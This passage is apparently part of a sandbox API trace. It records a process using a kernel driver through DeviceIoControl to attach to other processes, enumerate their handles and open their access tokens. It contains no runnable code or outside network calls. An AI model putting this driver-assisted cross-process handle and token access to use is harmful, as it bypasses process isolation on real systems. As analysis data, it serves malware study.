Process=0xfffff88005163558) returned 0x0 [0141.603] PsAcquireProcessExitSynchronization () returned 0x0 [0141.603] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.603] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a04b90, HandleInformation=0x0) returned 0x0 [0141.603] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.603] PsReleaseProcessExitSynchronization () returned 0x2 [0141.603] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.603] ObQueryNameString (in: Object=0xfffffa8003a04b90, ObjectNameInfo=0xfffffa8002fab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fab044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.603] ObfDereferenceObject (Object=0xfffffa8003a04b90) returned 0x1 [0141.603] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.603] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.603] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.603] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0141.604] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.604] PsAcquireProcessExitSynchronization () returned 0x0 [0141.604] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.604] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a07b20, HandleInformation=0x0) returned 0x0 [0141.604] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.604] PsReleaseProcessExitSynchronization () returned 0x2 [0141.604] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.604] ObQueryNameString (in: Object=0xfffffa8003a07b20, ObjectNameInfo=0xfffffa8002fce044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fce044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.604] ObfDereferenceObject (Object=0xfffffa8003a07b20) returned 0x2 [0141.604] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.604] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.604] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0141.604] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.604] PsAcquireProcessExitSynchronization () returned 0x0 [0141.604] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.604] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034ed070, HandleInformation=0x0) returned 0x0 [0141.604] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.604] PsReleaseProcessExitSynchronization () returned 0x2 [0141.604] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.604] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fd0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd0044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.605] ObfDereferenceObject (Object=0xfffffa80034ed070) returned 0x1 [0141.605] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.605] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.605] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.605] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.605] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.605] PsAcquireProcessExitSynchronization () returned 0x0 [0141.605] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.605] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0141.605] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.605] PsReleaseProcessExitSynchronization () returned 0x2 [0141.605] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.605] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.605] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0141.605] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.605] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.605] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.605] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0141.606] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.606] PsAcquireProcessExitSynchronization () returned 0x0 [0141.606] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.606] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800368b100, HandleInformation=0x0) returned 0x0 [0141.606] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.606] PsReleaseProcessExitSynchronization () returned 0x2 [0141.606] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.606] ObQueryNameString (in: Object=0xfffffa800368b100, ObjectNameInfo=0xfffffa8002fd2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd2044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.606] ObfDereferenceObject (Object=0xfffffa800368b100) returned 0x1 [0141.606] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.606] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.606] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.606] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.607] PsAcquireProcessExitSynchronization () returned 0x0 [0141.607] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.607] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acd3a0, HandleInformation=0x0) returned 0x0 [0141.607] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.607] PsReleaseProcessExitSynchronization () returned 0x2 [0141.607] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.607] ObQueryNameString (in: Object=0xfffffa8003acd3a0, ObjectNameInfo=0xfffffa8002fd3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd3044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.607] ObfDereferenceObject (Object=0xfffffa8003acd3a0) returned 0x1 [0141.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0141.607] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.607] PsAcquireProcessExitSynchronization () returned 0x0 [0141.607] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.607] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e98dd0, HandleInformation=0x0) returned 0x0 [0141.607] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.608] PsReleaseProcessExitSynchronization () returned 0x2 [0141.608] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.608] ObQueryNameString (in: Object=0xfffffa8001e98dd0, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.608] ObfDereferenceObject (Object=0xfffffa8001e98dd0) returned 0x1 [0141.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.608] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.608] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0141.608] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.608] PsAcquireProcessExitSynchronization () returned 0x0 [0141.608] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.608] ObReferenceObjectByHandle (in: Handle=0x5d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028187c0, HandleInformation=0x0) returned 0x0 [0141.608] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.608] PsReleaseProcessExitSynchronization () returned 0x2 [0141.608] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.608] ObQueryNameString (in: Object=0xfffffa80028187c0, ObjectNameInfo=0xfffffa8002fd5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd5044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.608] ObfDereferenceObject (Object=0xfffffa80028187c0) returned 0x1 [0141.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.609] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.609] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0141.609] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.609] PsAcquireProcessExitSynchronization () returned 0x0 [0141.609] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.609] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00139ed40, HandleInformation=0x0) returned 0x0 [0141.609] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.609] PsReleaseProcessExitSynchronization () returned 0x2 [0141.609] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.609] ObQueryNameString (in: Object=0xfffff8a00139ed40, ObjectNameInfo=0xfffffa8002fd6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd6044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.609] ObfDereferenceObject (Object=0xfffff8a00139ed40) returned 0x1 [0141.609] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.609] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.609] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0141.610] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.610] PsAcquireProcessExitSynchronization () returned 0x0 [0141.610] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.610] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002158070, HandleInformation=0x0) returned 0x0 [0141.610] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.610] PsReleaseProcessExitSynchronization () returned 0x2 [0141.610] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.610] ObQueryNameString (in: Object=0xfffffa8002158070, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.610] ObfDereferenceObject (Object=0xfffffa8002158070) returned 0x1 [0141.610] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.610] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.610] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.610] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0141.610] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.610] PsAcquireProcessExitSynchronization () returned 0x0 [0141.610] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.610] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001957190, HandleInformation=0x0) returned 0x0 [0141.610] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.611] PsReleaseProcessExitSynchronization () returned 0x2 [0141.611] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.611] ObQueryNameString (in: Object=0xfffff8a001957190, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0141.611] ObfDereferenceObject (Object=0xfffff8a001957190) returned 0x1 [0141.611] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.611] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x444) returned 0xc8 [0141.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0141.611] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80036e4060, HandleInformation=0x0) returned 0x0 [0141.611] ObOpenObjectByPointer (in: Object=0xfffffa80036e4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0141.611] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2d [0141.611] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa8001eba240 | out: TokenHandle=0xfffffa8001eba240*=0xc4) returned 0x0 [0141.611] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0141.611] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.611] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0141.611] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0141.614] CloseHandle (hObject=0xc4) returned 1 [0141.614] CloseHandle (hObject=0xc8) returned 1 [0141.614] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.614] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0141.614] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.614] PsAcquireProcessExitSynchronization () returned 0x0 [0141.614] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880051635d0) [0141.614] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036e5270, HandleInformation=0x0) returned 0x0 [0141.614] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.614] PsReleaseProcessExitSynchronization () returned 0x2 [0141.614] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0141.614] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.614] ObfDereferenceObject (Object=0xfffffa80036e5270) returned 0x1 [0141.615] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.615] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.615] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.615] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0141.615] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.615] PsAcquireProcessExitSynchronization () returned 0x0 [0141.615] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880051635d0) [0141.615] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0141.615] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.615] PsReleaseProcessExitSynchronization () returned 0x2 [0141.615] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0141.615] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.615] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0141.615] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.615] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0xc8 [0141.616] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0141.616] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80036d0060, HandleInformation=0x0) returned 0x0 [0141.616] ObOpenObjectByPointer (in: Object=0xfffffa80036d0060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0141.616] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18c [0141.616] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa8001eba240 | out: TokenHandle=0xfffffa8001eba240*=0xc4) returned 0x0 [0141.616] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0141.616] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.616] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0141.616] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0141.618] CloseHandle (hObject=0xc4) returned 1 [0141.618] CloseHandle (hObject=0xc8) returned 1 [0141.618] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.619] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, 